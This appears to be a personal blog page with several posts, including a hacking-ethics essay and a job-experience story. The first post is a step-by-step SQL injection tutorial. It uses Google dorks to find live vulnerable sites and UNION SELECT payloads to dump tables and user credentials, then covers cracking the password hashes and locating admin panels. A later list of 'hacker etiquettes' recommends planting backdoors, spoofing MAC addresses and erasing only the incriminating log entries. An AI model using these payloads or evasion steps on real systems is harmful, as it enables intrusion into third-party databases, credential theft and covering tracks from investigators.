Dear readers, you have been following me on this blog which is on * I am freaking happy to announce that I have transferred all the blog posts to new domain and new hosting of my own. Please visit from now on. Thanks all!

Big time!!! Been long time since I posted this blog, this would be something interesting than usual one which helps you to bring out the hacker inside you 😉 SQL Injection which is commonly known as SQLI! Here I would be demonstrating about SQLI which is the one of the top 10 vulnerabilities listed in OWASP (Online Web Application Security Project) not just one of the top 10 vulnerabilities but oldest and topmost from so many years.

This blog, no I can say tutorial! This tutorial gives you the idea to get into any database which has SQL vulnerability. So let’s go ahead with basics.

What is SQL?
SQL (or Structured Query Language) is a special-purpose programming language designed for managing data held in a relational database management system (RDBMS).

What is SQL Injection?
SQL injection is a code injection technique that exploits security vulnerability in an application’s software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
To start with this exploitation we can utilize Google in finding the sites which has possibility of having the application vulnerable using Google Dorks.

What are Google Dorks?
Google dorks or Google Operators are the center of attraction for Google Hacking, which helps in extracting required information from the Google. Many hackers use Google to find vulnerable webpage’s and later use these vulnerabilities for hacking. You can get a list of Google Dorks here

Using Google Dorks:

But for now the only Google dorks we will be using for extracting required information are,

  • inurl:index.php?id=
  • inurl:page.php?id=
  • inurl:prod_detail.php?id=

These will list all websites containing ” prod_detail.php?id=in the URL. (Depending on Dork we are using)

NOW, enter that into Google and start opening WebPages. Finding SQLI Vulnerabilities in websites is very simple. You can simply use a single ‘ or a ” at the end of the URL.


If the website is vulnerable it will produce an error which is similar to the following:

Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

If you see this that means you have found a SQL Injection vulnerability in the website. For security purpose let’s consider domain as “example” for this tutorial:

Exploiting the vulnerability′

SQL Injection Error Message
This shows that the website is vulnerable to SQL injection.

Step 1: Finding how many columns the site has

To do this we use the Order by query to find how many columns it has. order by 100–

We will most likely get an error saying,

Query failed: 1054 – Unknown column ‘100’ in ‘order clause’
Select products_model, products_name, products_short, products_image, products_price, products_status, products_describe, categories_name, manufacturers_name from products join manufacturers on (fi_manufacturers = id_manufacturers) join categories on (fi_categories = id_categories) where id_products = 837 order by 100–

SQL Injection Error on Colomns
That means the number is too high so we will lower it. order by 10–

If we get an error yet again, the number is still too high, try with lesser value. Let’s take 7 order by 7–

The page will most likely load successfully, if not, then the site may not be fully vulnerable to SQL injection. If it loads successfully increase the number yet again. Once you get to the Max number where it loads successfully, that is the amount of columns a site has. Here in this example it is 9. order by 9–

SQL Injection Order By
Step 2: Finding the vulnerable columns.

To do this we use Union All Select. Like So, union all select 1,2,3,4,5,6,7,8,9–

With some sites that won’t be enough to find the vulnerable columns, sometimes it needs the extra push, so we need to force the error. Add a behind the 837 like this prod_detail.php?id=-837

The URL should look like, union all select 1,2,3,4,5,6,7,8,9–

SQL Injection Union Slect All

Now it will show the vulnerable columns. The vulnerable columns will be numbers that weren’t there before; the page will also look a lot different. In this case Columns 1, 2,3,7,8 and 9 are vulnerable.

Step 3: Exploiting vulnerability

Now, here comes the hardest part as people think but it’s not that hardest! Mind it; anything is possible if you love it. Let’s just collect some info about the site. Such as Database Name, User Name, and the Version. Remember the vulnerable columns from before? This is where we use them!

In your Union All Select statement replace the vulnerable column numbers with the three bits of info you want. [Database(), User(), Version()]. union all select version(),database(),user(),4,5,6,7,8,9–

SQL Injection Command Execution

Where the 1,2,3 were on the page before (Or whatever vulnerable column number you used) The bits of information will show on this website, the three pieces of information are,

Database(): web***2
User(): web***u @ localhost
Version(): 5.6.10-log

Great, our first bits of extracted data! We should get some more information. Now before we continue on there are something’s that you’ll need.

  1. Firefox Browser
  2. HackBar Plugin

Okay let’s continue, Next step is to list all the tables. We will now use Group_Concat(table_name) and from information_schema.tables where table_schema=database()–

Don’t worry its simpler than it looks! URL looks like this, union all select 1,2,3,4,5,6,group_concat(table_name),8,9 from information_schema.tables where table_schema=database()–

Hey Look! Tables 😉

categories, config, contents, counter, manufacturers, news, orders, orders_products, products, user

SQL Injection Tables

Well done you’ve successfully extracted the table names. But wait, there’s more! Sadly there is no admin table, but sometimes there is. So let’s go with exploring user table.

Have you installed that Firefox plug-in yet? Because you are going to need it now.

Next thing you need to do is replace Group_Concat(Table_Name) with group_concat(Column_name). If you have HackBar installed press F9, click SQL drop down button go to MySQL then click MySQL CHAR() and Enter the table name.

In this case, user and replace from information_schema.tables where table_schema=database()– with from information_schema.columns where table_name=MYSQLCHAR

The Char will be the code you receive from HackBar in this case user can be encoded as CHAR (117, 115, 101, 114)

The Final URL will look like this: union all select 1,2,3,4,5,6,group_concat(column_name),8,9 from information_schema.columns where table_name=CHAR(117, 115, 101, 114)–

Okay, cool, we have the column names now.


SQL Injection Columns

Now our next task is to get the data from these columns. To do this replace group_concat(column_name) with group_concat(Column_name_2,0x3a,Column_name_3) Where Column_name_2 and Column_name_3 are the column names you want to extract data from. Such as user_name and user_pw.

Now change from information_schema.columns where table_name=CHAR to from user if you want to extract data from a different table name change user to the table name you want to extract data from.

The URL looks like this, union all select 1,2,3,4,5,6,group_concat(user_name,0x3a,user_pw),8,9 from user—

SQL Injection Credentials

We’ve now extracted data! Good Job.

Now we got user table which also contains the admin credentials and we found Username and Password of user you will find MD5 hashed passwords usually. Too decrypt these go to it’s a great site!

You also need to find the admin control panel, try simple URL’s like /admin or /login etc. look on Google for an admin page finder tools. Hope this helps you!

This blog is purely for educational purposes only. Information posted is not intended to harm anyone or any organization.

If anyone wants to have the document on your local system, download it here.

Sit Down Series – 2

Posted: April 21, 2013 in Hacking
Tags: , ,

Download Beta
Hi Readers.

Below we have jotted down a few etiquettes of a Hacker and his/her Victim. Hope this helps you if you are/were one among them.

Etiquettes – Victim

  1. It is okay to panic, even hackers get hacked. It can be a learning experience.
  2. Be normal.
  3. Change the password from own/other system.
  4. Clear the temp [TEMP, %TEMP%] folder.
  5. Restart the system.
  6. Report the issue.
  7. Post your queries at forums find related issues and may be you will find a solution [temporary/permanent].
  8. Check your task manager, test your firewall for suspicious/malicious program and terminate them.
  9. Save the records of the attack, to investigate or report the incident.
  10. Sign off from all logged in sessions.
  11. Try to remember your last login activity.
  12. Have you saved your password on other system?
  13. Did your hacker friend plant this attack?
  14. Have you shared your password with anyone?
  15. Safeguard your other accounts [bank/other] that are linked to the compromised account.
  16. Let your community know that your account has been compromised.
  17. Find measures to safeguard your account.
  18. Write about it, spread the awareness.
  19. Importantly check if it‘s a spoof or a real attack.
  20. Remember humans are the weakest link.

Etiquettes – Hacker

  1. Acquire necessary permission to plant any attack.
  2. Obtain grants, permissions, rights for every action of yours.
  3. Watch every step of yours [must be retrace-able].
  4. Use the rights ethically.
  5. Own responsibility for your actions.

Secure your machine first.

  1. Use Proxy IP addresses.
  2. Create a backdoor which helps you to plant your next attack.
  3. Be anonymous.
  4. Clear the last login activity if you are using the victim’s system to hack his/her own account.
  5. Build layers of security to prevent easy trace backing.
  6. Spoof the Media Access Control address.
  7. Use public cyber space to plant your attack, if you are an amateur 😛
  8. Erase your tracks.( Don’t delete entire logfiles, instead, just remove only the incriminating entries from the file. )

Hackers misusing this information may be a local and/or federal criminal act (crime). This article is intended to be informational and should only be used for ethical and not illegal purposes.

We web security enthusiasts (Santhosh Tuppad, Jyothi R and I) got together to learn and share about Computer and Web Security.

Black and white hat hackers have their own set of ethics. What does your list look like, do share.

Happy reading!

What is hacking?? What is hack?? Who is hacker?

The main intention of this blog is to educate people about hacking. Most of the people I have met have a different and confusing meaning of hacking. The most common answer which I heard was “getting password of a different user i.e. unauthorized access or stealing money from others account”.

This perception on hacking is because of lack of information or what people have heard. Similar situation appeared in one of the talks on Information Security which was held at one of the famous engineering college in Bangalore by Santhosh Tuppad who is a security specialist and my Guru. Students showed a great interest as the talk was regarding hacking/security, but initially when they were asked, what hacking is, the answers were again the same old. This inspired me to write this blog, so that it helps in understanding more on hacking.

The term Hacker was first introduced in 1960’s and was used to describe a programmer or someone who hacked out computer code. Later the term evolved to an individual who had an advanced understanding of computers, networking, programming, or hardware, but did not have any malicious intents.

Hacking is a practice of altering or modifying the features of a system or an application, in order to accomplish a goal outside the creator’s original design or aim. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker.

Recently, Computer hacking is the most popular form of  hacking , mainly in the field of Information Security, but hacking exists in many other forms like cellular hacking, web app hacking, network hacking etc. and its not limited to this and can be extended to anything in this world. Just because of great attention given to black hat hackers from the social media, the whole hacking term is often mistaken for any security related cybercrime. This damages the reputation of all hackers, and is very bad and unfair. The other intention of this blog is to introduce people the true ethics of hackers, hopefully clearing the blame they are facing now and giving them the social status which they actually deserve.

Crackers!!! Malicious attacks on computer networks are officially known as cracking, these are another set of people who call themselves as hackers, but technically speaking they aren’t. These are people who break into computers and phreaking the phone system with minimal knowledge on the system or the application and loudly call themselves as hackers. But many journalists and writers have been fooled into using the word hacker to describe crackers.

Hackers solve problems in their own way, they solve problems in different way. Actually the way of thinking itself is different and they believe in freedom and live as they wish to. To be recognized as a hacker, you have  to set your own rules and attitude which suits your identity and to behave as though you have a great attitude and passion on yourself.

Hacktivist!!!! He is considered as an hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks. In more extreme cases, hacktivism is used as tool for Cyber terrorism.

The people who actually build Web applications are not paying much attention to security. Stakeholders are looking for people who are creative and able to build interesting Web sites rather than secured websites. They rate security to No. 6 and creativeness to No. 1

Reasons for hacking are very different like,

  • Criminal intent: stealing credit card numbers, harming a competing company, extortion of money by threatening to hack again or reveal sensitive information found on the computer and other reasons.
  • Ideological reasons: Some hackers would attack sites that go against their worldview  anti-globalists hack sites of large corporations, some groups of Muslim hackers attack Israeli sites from time to time, and sites of racist organizations often come under attack.
  • Personal revenge: Some hackers would use their skills to harm people for real or perceived wrongs, to either ruin their computer or find personal information and make it public.
  • Some hackers simply attack in order to harm. They are angry at the world for something, and hacking is their way to perform vandalism.
  • Some hackers attack to check their skills at computer safety. Sometimes those attacks will cause no harm, and in some cases the hacker will inform the victims of failure in his defenses.

Well.. last but not least, Hacking is an art. It won’t happen overnight. Hacking is a game to prove how smart you are.  Start by learning a programming language. Depending on what you want to do (Web Hacking or System Hacking)


The experience starts

Posted: March 18, 2013 in Experience
Tags: , ,

Moolya one of the craziest company which I have ever seen!!! Yes that’s true. Journey starts here, I came to know that Moolya is hiring fresh minds, I need to tell you about Moolya which u feel strange but that’s  true, I wanted to apply, but how will my resume be different, and I knew Moolya hires people who think differently and do things differently [THINK OUT OF THE BOX] and of course I’m one among them and I wanted to send my resume written by my own hands and not by typing and posting it to moolya. But I didn’t had enough time to do this, Now comes the question how to apply was one my question… started searching and exploring more about  Moolya then came the first thing, its blogs(1 year celebrations)..i was really impressed by them.. And comes the curious tester’s blog. I felt amazed reading them, finally i got the mail id of curioustester Miss Parimala Hariprasad, i sent mail briefing about me and mentioned that I’m seeking for an opportunity. I was eagerly waiting for the response and to my surprise I got a mail the next day morning i.e. 26th morning asking me to come for an interview the same day I was so happy that I got a interview call so soon but I was bit scared as I was not ready or prepared for interview. But with great positive energy, I said to myself “This is your chance utilize it, If not you can’t be Moolyavan”.

It was 11 am when I reached Moolya office for the interview. My first round of the interview was fantastic and I was surprised that I had enough knowledge/skill to impress or convince a Moolyavan(Vipin). Programming was my next round I was done with it and was waiting for the results of that round, in the mean time I heard people fighting and complaining like school kids 😀  One person goes on like “Pariiiii ask him to give back my note, It’s mine.”:P I was like,  WHAT THE HECK!!! These people are crazy they are having fun like kids, this was first instance which I observed a craziest side of a Moolyavan.

And finally results were out for the programming round, and I had cleared. Anjali (HR) called me inside for another round of interview. I was shocked as soon as I entered the cabin, 2 people ( Pradeep Soundararajan and Sunil Kumar ) welcomed me, I was like GOD “2 on 1” that’s ridiculous. But I also said myself “You know what you are and you have to prove it to these people” as I just settled they started with couple of standard interview questions and my past experience, skills, etc. They were really happy for my responses. Actually they were shocked for my responses and final verdict was out and I got the job. 🙂

There were couple of instances which made me feel wow about Moolya,

  • Employees had come to office in ¾ th pants.
  • Candidates appearing for the interview will be provided with a greeting card for spending their precious time.
  • Moolya treats every employee as a Co-Owner of the company.
  • The foosball table.
  • The party after work.

I joined Moolya on 29th Jan. I was so excited that I reached office by 8 AM and the office was not yet opened 😀  I roamed for a while and came back. And my first task was to assemble my system in my cubical, followed by a session on Software Testing by Master shifu Parimala. There’s company’s policy to take the newly joined employee for lunch and we had been out for lunch and the actual fun started by 4. Everyone was busy working on their projects and suddenly some people started telling Chocolate time and they gathered, I was shocked and was waiting for what it was. And I observed that I was in the middle of the gathering and I understood it was for an introduction and followed by RAGING:P yeah you heard it right everyone asked me to dance for a song. Worst thing is I don’t know to dance, in my life I never tried but somehow I managed to do 😀  and followed by other stuff on testing’s.

I just completed 1 month at Moolya, it is great time working in Moolya with a great pleasure of working differently in all the ways including this blog, I never imagined myself writing a blog and again it’s through Moolya’s inspiration. I’m really glad to work in Moolya for making me feel proud of myself.

It’s exactly one month I’m working here as a tester, 26th Feb a mail from Mozilla surprised me and made me go high. And guess what for the security bug I reported I got a bounty of $500 Dollars Yeah you heard it right, that’s true. A security bug in Mozilla which I reported made me enter “Mozilla Hall Of Fame” and a bug bounty which happened for the first time in my life. Again this credit goes to Moolya, my team and Ravi  who guided me in the right path.

Pari, special thanks to you, without you I wouldn’t have been here. All the credit goes to you. 🙂

Finally “I am here for a mission. And i want to fulfill it, with all the passion i carry and all the guidance i have. I wish a great journey awaits me with all the great people around me. For time being this is all what i want to share. Stay tuned to know more about my Software testing journey”.